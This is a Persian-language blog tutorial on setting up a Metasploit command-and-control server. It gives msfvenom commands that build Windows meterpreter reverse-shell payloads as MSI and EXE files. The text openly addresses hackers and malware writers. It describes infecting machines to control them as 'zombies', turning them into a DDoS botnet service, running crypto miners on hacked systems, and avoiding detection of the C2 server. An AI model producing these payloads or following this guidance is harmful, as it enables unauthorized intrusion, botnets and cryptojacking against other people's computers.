آموزش ساخت C2 با متااسپلویت
- کورش سنایی
- ۱۹ مهر ۱۴۰۳
- زمان مطالعه: 5 دقیقه
به آموزش ساخت C2 با متااسپلویت خیلی خوش آمدید; در ادامه این آموزش هک با ما همراه باشید تا این مهارت ضروری برای هکرها, کرکرها و بدافزار نویس هارو باهم به صورت عملی پیش ببریم . در این آموزش ساخت C2 دو سیستم ویندوزی رو با استفاده از یک بد افزار آلوده میکنیم و توسط یک سرور به صورت Remote بر روی اونها کد اجرا میکنیم .
C2 چیست ؟
C2 یا Command and Control سیستمی است که مهاجمان سایبری برای کنترل از راه دور دستگاههای آلوده (مثل کامپیوترها یا سرورها) استفاده میکنند. از طریق C2، مهاجم میتواند دستورات را به دستگاههای آلوده بفرستد، اطلاعات را جمعآوری کند یا حملات دیگری را انجام دهد. لازم به ذکر هست که ما به این سیستم های آلوده زامبی میگیم . اگر کامل تر میخواین در مورد بات نت و C2 بدونید این مطلب بات نت چیست رو مطالعه کنید.
آموزش ساخت C2 با متااسپلویت
متااسپلویت بزرگترین ابزار تست نفوذ جهان, یکی از قابلیت هایی که به ما ارائه میده یک C2 رایگان و کاربردی هست که برای درک عملکرد c2 و کنترل زامبی هاتون میتونه به شدت به کمک شما بیاد . در ادامه آموزش ساخت C2 با متااسپلویت رو به صورت ویدیویی به همراه هک عملی از 0 پیش میبریم .
کد ساخت installer msi
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f msi -o shell.msi
کد ساخت shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o shell.exe
چرا باید ساخت C2 با متااسپلویت رو یادبگیریم ؟
نکته اول اینکه ساخت C2 با متااسپلویت کاملا رایگان هست و هر شخصی نسبت به نیازی که داره , استفاده متفاوتی هم از C2 میبره; توجه داشته باشید که اگر خیلی کار بزرگی میخواین انجام بدید این آموزش میتونه هویت شمارو به خطر بندازه و تکنیک های حرفه ای تری هست برای مخفی کردن C2 و جلوگیری از شناسایی شدن c2 سرورتون پس فقط برای شروع و کارای روزمره عادیتون فعلا از این آموزش استفاده کنید و برای حرفه ای تر شدن از دوره ابزار های ضروری تست نفوذ ما استفاده کنید . در ادامه آموزش ساخت c2 با metasploit چند نمونه استفاده ای که میتونید ببرید رو قرار میدیم :
اولین اتفاقی که میفته کنترل زامبی ها براتون راحت میشه, دستتون خیلی باز میشه برای هک و ارتقا سطح دسترسیتون و و خوب کارای زیادی هم میتونید انجام بدید از جمله باتن نت برای دیداس ; شما میتونید یک سرویس دیداس با همین آموزش ایجاد کنید فقط کافیه که یک فایل دیداس رو انتقال بدید به سرور هاتون که روش انتقال فایل رو در ویدیوی آموزش ساخت C2 با متااسپلویت یادگرفتیم, و در زمان نیاز دستور حمله رو به سرور هاتون در 1 لحظه ارسال کنید و بومم .
شما میتونید ماینر روی تمامی سیستم هایی که هک میکنید اجرا کنید, فایل آپلود و دانلود کنید و … در واقع هر کاری که عادت دارید انجام بدید رو الان میتونید یکجا انجامش بدید و دسترسیتون رو حفظ کنید, زامبی هاتون رو زیرنظر داشته باشید; زامبی هارو کنترل کنید و …
C2 های محبوب مورد استفاده هکرها
بر اساس اطلاعات ارائه شده در MITRE ATT&CK، چندین C2 (Command and Control) محبوب وجود دارند که به طور گسترده توسط مهاجمان استفاده میشوند. برخی از آنها شامل موارد زیر هستند:
Sliver: Sliver یک C2 مدرن و منبع باز است که توسط تیمهای تست نفوذ و مهاجمان سایبری استفاده میشود. این ابزار قابلیت اجرای دستورات از راه دور، انتقال فایلها و انجام تکنیکهای پنهانسازی مانند استفاده از پروتکلهای DNS و HTTP/S را دارد. همچنین، از رمزنگاریهای پیشرفته مثل AES و TLS برای امنیت ارتباطات C2 بهره میبرد.
ShadowPad: ShadowPad یک ابزار C2 پیشرفته است که به طور خاص توسط گروههای APT (Advanced Persistent Threat) مانند APT41 استفاده میشود. این ابزار از پروتکلهای HTTP، DNS و FTP برای ارتباط با سرور C2 استفاده میکند و میتواند دادهها را رمزنگاری کرده و از تکنیکهای پنهانسازی پیچیده برای جلوگیری از شناسایی استفاده کند.
Cobalt Strike: Cobalt Strike یکی از محبوبترین چارچوبهای C2 است که توسط مهاجمان و تیمهای تست نفوذ استفاده میشود. این ابزار از پروتکلهای مختلف مانند HTTP و HTTPS برای انتقال دادهها استفاده میکند و قابلیتهایی مانند ارسال و دریافت دادههای حساس و کنترل از راه دور سیستمهای آلوده را دارد.
استفاده از این C2 ها به دلیل ویژگیهایی مانند پنهانسازی پیشرفته، مدیریت متمرکز سیستمهای آلوده و قابلیت انتقال فایلها و اجرای دستورات از راه دور، بسیار مورد توجه قرار گرفتهاند. اما تمام این C2 یا C&C ها رایگان نیستند و به همین دلیل ممکنه نیاز بشه که شما به سمت C2 های رایگانی مثل Empire و متااسپلویت بیاید تا کارتون راه بیفته ; ما در این آموزش ساخت C2 با متااسپلویت سعی کردیم تا جایی که میشه خیلی ساده شما رو با این مبحث به صورت عملی آشنا کنیم .
نتیجه گیری از آموزش ساخت C2 با متااسپلویت
هر شخصی که در دنیای تست نفوذ کار کنه اسم C2 به گوشش خواهد خورد و اگر ادعایی داشته باشه باید بتونه فورا یک C2 launch کنه و از راه دور به تعداد زیاد زامبی هاش دستور بده! برای مثال اگر یک فایل مخرب رو جایی قرار دادید ممکنه 10 ها زامبی کسب کنید و اینجا شما باید همرو با هم مدیریت کنید در واقع یک کنترلر باید داشته باشید که زامبی ها به حرفش گوش کنن و دستورات اربابشون که شما باشید رو اجرا کنن که این دستورات هر چیزی که باب میل هکر هست میتونه باشه .